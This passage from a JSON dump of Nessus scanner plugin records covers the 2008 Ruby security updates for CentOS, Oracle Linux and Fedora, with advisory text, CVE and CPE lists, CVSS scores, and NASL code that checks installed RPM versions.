"p-cpe:/a:redhat:enterprise_linux:ruby-mode", "p-cpe:/a:redhat:enterprise_linux:ruby-libs", "cpe:/o:redhat:enterprise_linux:5.2", "p-cpe:/a:redhat:enterprise_linux:ruby-devel", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:ruby-tcltk"], "scheme": null}
{"nessus": [{"lastseen": "2021-01-06T09:25:24", "description": "Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "edition": 27, "published": "2008-10-28T00:00:00", "title": "CentOS 4 / 5 : ruby (CESA-2008:0897)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-4310", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2008-10-28T00:00:00", "cpe": ["p-cpe:/a:centos:centos:ruby-tcltk", "p-cpe:/a:centos:centos:ruby", "p-cpe:/a:centos:centos:ruby-rdoc", "p-cpe:/a:centos:centos:ruby-libs", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:ruby-mode", "p-cpe:/a:centos:centos:ruby-docs", "p-cpe:/a:centos:centos:ruby-devel", "p-cpe:/a:centos:centos:irb", "p-cpe:/a:centos:centos:ruby-ri", "p-cpe:/a:centos:centos:ruby-irb", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2008-0897.NASL", "href": "https://www.tenable.com/plugins/nessus/34502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0897 and \n# CentOS Errata and Security Advisory 2008:0897 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34502);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-1145\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2008-4310\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0897\");\n\n script_name(english:\"CentOS 4 / 5 : ruby (CESA-2008:0897)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015340.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f33f148\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015341.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd91bfb9\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015345.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44810b1b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015354.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?984199a2\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015355.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7677ed58\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 22, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"irb-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-devel-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-docs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-libs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-mode-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T12:44:14", "description": "From Red Hat Security Advisory 2008:0897 :\n\nUpdated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "edition": 25, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 / 5 : ruby (ELSA-2008-0897)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-4310", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:irb", "p-cpe:/a:oracle:linux:ruby-irb", "p-cpe:/a:oracle:linux:ruby-ri", "p-cpe:/a:oracle:linux:ruby-devel", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:ruby", "p-cpe:/a:oracle:linux:ruby-docs", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:ruby-tcltk", "p-cpe:/a:oracle:linux:ruby-libs", "p-cpe:/a:oracle:linux:ruby-rdoc", "p-cpe:/a:oracle:linux:ruby-mode"], "id": "ORACLELINUX_ELSA-2008-0897.NASL", "href": "https://www.tenable.com/plugins/nessus/67752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0897 and \n# Oracle Linux Security Advisory ELSA-2008-0897 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67752);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1145\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2008-4310\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0897\");\n\n script_name(english:\"Oracle Linux 4 / 5 : ruby (ELSA-2008-0897)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0897 :\n\nUpdated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-October/000767.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-October/000769.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 22, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"irb-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-devel-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-docs-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-libs-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-mode-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-tcltk-1.8.1-7.0.1.el4_7.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:06:43", "description": "Update to new upstream release fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-\nvulnerabilities-in-ruby/ - CVE-2008-3655 - multiple insufficient safe\nmode restrictions - CVE-2008-3656 - WEBrick DoS vulnerability (CPU\nconsumption) - CVE-2008-3657 - missing 'taintness' checks in dl module\n- CVE-2008-3905 - resolv.rb adds random transactions ids and source\nports to prevent DNS spoofing attacks\nhttp://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\nrexml/ - CVE-2008-3790 - DoS in the REXML module One issue not covered\nby any upstream advisory: - CVE-2008-3443 - DoS in the regular\nexpression engine\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-10-10T00:00:00", "title": "Fedora 8 : ruby-1.8.6.287-2.fc8 (2008-8736)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2008-10-10T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:ruby"], "id": "FEDORA_2008-8736.NASL", "href": "https://www.tenable.com/plugins/nessus/34379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8736.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34379);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 30802);\n script_xref(name:\"FEDORA\", value:\"2008-8736\");\n\n script_name(english:\"Fedora 8 : ruby-1.8.6.287-2.fc8 (2008-8736)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream release fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-\nvulnerabilities-in-ruby/ - CVE-2008-3655 - multiple insufficient safe\nmode restrictions - CVE-2008-3656 - WEBrick DoS vulnerability (CPU\nconsumption) - CVE-2008-3657 - missing 'taintness' checks in dl module\n- CVE-2008-3905 - resolv.rb adds random transactions ids and source\nports to prevent DNS spoofing attacks\nhttp://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\nrexml/ - CVE-2008-3790 - DoS in the REXML module One issue not covered\nby any upstream advisory: - CVE-2008-3443 - DoS in the regular\nexpression engine\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ruby-lang.org/en/news/2008/08/08/multiple-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=459266\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=460134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=461495\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-October/015239.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfefb88c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release 